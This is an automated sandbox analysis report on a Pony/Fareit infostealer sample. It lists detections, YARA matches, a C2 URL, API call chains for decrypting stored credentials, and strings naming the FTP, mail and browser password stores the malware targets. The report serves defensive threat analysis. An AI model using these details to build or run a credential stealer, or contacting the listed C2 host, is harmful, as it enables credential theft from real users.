Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2qsdqACnX3.exe

Overview

General Information

Sample name:2qsdqACnX3.exe
renamed because original name is a hash value
Original sample name:73339cacdb37937c47ea7668ac3a1017.exe
Analysis ID:1523193
MD5:73339cacdb37937c47ea7668ac3a1017
SHA1:b32d273a752ad25173e26a110ae05acbabf3f15d
SHA256:d0abb0bd329f13afadfb0bbf6730f2233488b8c6c6f5e593d61d91b20fe8b772
Tags:exePonyuser-abuse_ch
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2qsdqACnX3.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\2qsdqACnX3.exe" MD5: 73339CACDB37937C47EA7668AC3A1017)
    • cmd.exe (PID: 940 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://gunnylaumienphi2017.com/"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
2qsdqACnX3.exeJoeSecurity_PonyYara detected PonyJoe Security
    2qsdqACnX3.exeWindows_Trojan_Pony_d5516fe8unknownunknown
    • 0x12518:$a1: \Global Downloader
    • 0x11ca1:$a2: wiseftpsrvs.bin
    • 0x12378:$a3: SiteServer %d\SFTP
    • 0x1236c:$a4: %s\Keychain
    • 0x125d6:$a5: Connections.txt
    • 0x1291d:$a6: ftpshell.fsi
    • 0x13078:$a7: inetcomm server passwords
    2qsdqACnX3.exeponyIdentify PonyBrian Wallace @botnet_hunter
    • 0x10eb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x130bf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
    • 0x10777:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
    • 0x10d98:$s3: POST %s HTTP/1.0
    • 0x10dc1:$s4: Accept-Encoding: identity, *;q=0
    2qsdqACnX3.exeFareitFareit Payloadkevoreilly
    • 0x132f9:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x2518:$a1: \Global Downloader
      • 0x1ca1:$a2: wiseftpsrvs.bin
      • 0x2378:$a3: SiteServer %d\SFTP
      • 0x236c:$a4: %s\Keychain
      • 0x25d6:$a5: Connections.txt
      • 0x291d:$a6: ftpshell.fsi
      • 0x3078:$a7: inetcomm server passwords
      00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0xeb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x30bf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x777:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0xd98:$s3: POST %s HTTP/1.0
      • 0xdc1:$s4: Accept-Encoding: identity, *;q=0
      00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_PonyYara detected PonyJoe Security
        00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
        • 0x2518:$a1: \Global Downloader
        • 0x1ca1:$a2: wiseftpsrvs.bin
        • 0x2378:$a3: SiteServer %d\SFTP
        • 0x236c:$a4: %s\Keychain
        • 0x25d6:$a5: Connections.txt
        • 0x291d:$a6: ftpshell.fsi
        • 0x3078:$a7: inetcomm server passwords
        Click to see the 5 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.2qsdqACnX3.exe.400000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
          0.2.2qsdqACnX3.exe.400000.0.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
          • 0x13318:$a1: \Global Downloader
          • 0x12aa1:$a2: wiseftpsrvs.bin
          • 0x13178:$a3: SiteServer %d\SFTP
          • 0x1316c:$a4: %s\Keychain
          • 0x133d6:$a5: Connections.txt
          • 0x1371d:$a6: ftpshell.fsi
          • 0x13e78:$a7: inetcomm server passwords
          0.2.2qsdqACnX3.exe.400000.0.unpackponyIdentify PonyBrian Wallace @botnet_hunter
          • 0x11cb9:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
          • 0x13ebf:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
          • 0x11577:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
          • 0x11b98:$s3: POST %s HTTP/1.0
          • 0x11bc1:$s4: Accept-Encoding: identity, *;q=0
          0.2.2qsdqACnX3.exe.400000.0.unpackFareitFareit Payloadkevoreilly
          • 0x140f9:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
          0.0.2qsdqACnX3.exe.400000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 2qsdqACnX3.exeAvira: detected
            Found malware configuration
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://gunnylaumienphi2017.com/"]}
            Multi AV Scanner detection for submitted file
            Source: 2qsdqACnX3.exeVirustotal: Detection: 77%Perma Link
            Source: 2qsdqACnX3.exeReversingLabs: Detection: 94%
            Yara detected Pony
            Source: Yara matchFile source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara matchFile source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 2qsdqACnX3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040A2F4 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,0_2_0040A2F4
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040CFA0 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040CFA0
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040B818 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,0_2_0040B818
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040A54F CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,0_2_0040A54F
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040A139 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,0_2_0040A139
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040CA1F lstrlen,CryptUnprotectData,LocalFree,0_2_0040CA1F
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040A706 lstrlen,CryptUnprotectData,LocalFree,0_2_0040A706
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00403FF9 CryptUnprotectData,LocalFree,0_2_00403FF9
            Source: 2qsdqACnX3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00403DC3 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00403DC3
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00404E00 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00404E00
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_004086C7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_004086C7
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00404A90 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404A90
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00409414 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409414
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00408543 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408543
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://gunnylaumienphi2017.com/
            Source: 2qsdqACnX3.exe, 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: 2qsdqACnX3.exeString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
            Source: 2qsdqACnX3.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: 2qsdqACnX3.exeString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
            Source: 2qsdqACnX3.exeString found in binary or memory: http://gunnylaumienphi2017.com/
            Source: 2qsdqACnX3.exeString found in binary or memory: http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
            Source: 2qsdqACnX3.exeString found in binary or memory: http://https://ftp://operawand.dat_Software
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: 2qsdqACnX3.exe, 00000000.00000002.2034670536.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected Pony
            Source: Yara matchFile source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara matchFile source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: Fareit Payload Author: kevoreilly
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Pony trojan / infostealer detected
            Source: Signatures Results: All Signatures
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_004104C90_2_004104C9
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00402CD20_2_00402CD2
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: String function: 00403F6E appears 51 times
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: String function: 00401B46 appears 139 times
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: String function: 0041016C appears 42 times
            Source: 2qsdqACnX3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 2qsdqACnX3.exe, type: SAMPLEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: classification engineClassification label: mal100.troj.spyw.winEXE@5/1@0/0
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040CFA0 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040CFA0
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040273D LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_0040273D
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_00402ABC WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,0_2_00402ABC
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: 0_2_0040A457 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_0040A457
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile created: C:\Users\user\AppData\Local\Temp\5990015.batJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
            Source: 2qsdqACnX3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 2qsdqACnX3.exe, 00000000.00000003.2013000324.0000000000753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 2qsdqACnX3.exeVirustotal: Detection: 77%
            Source: 2qsdqACnX3.exeReversingLabs: Detection: 94%
            Source: unknownProcess created: C:\Users\user\Desktop\2qsdqACnX3.exe "C:\Users\user\Desktop\2qsdqACnX3.exe"
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
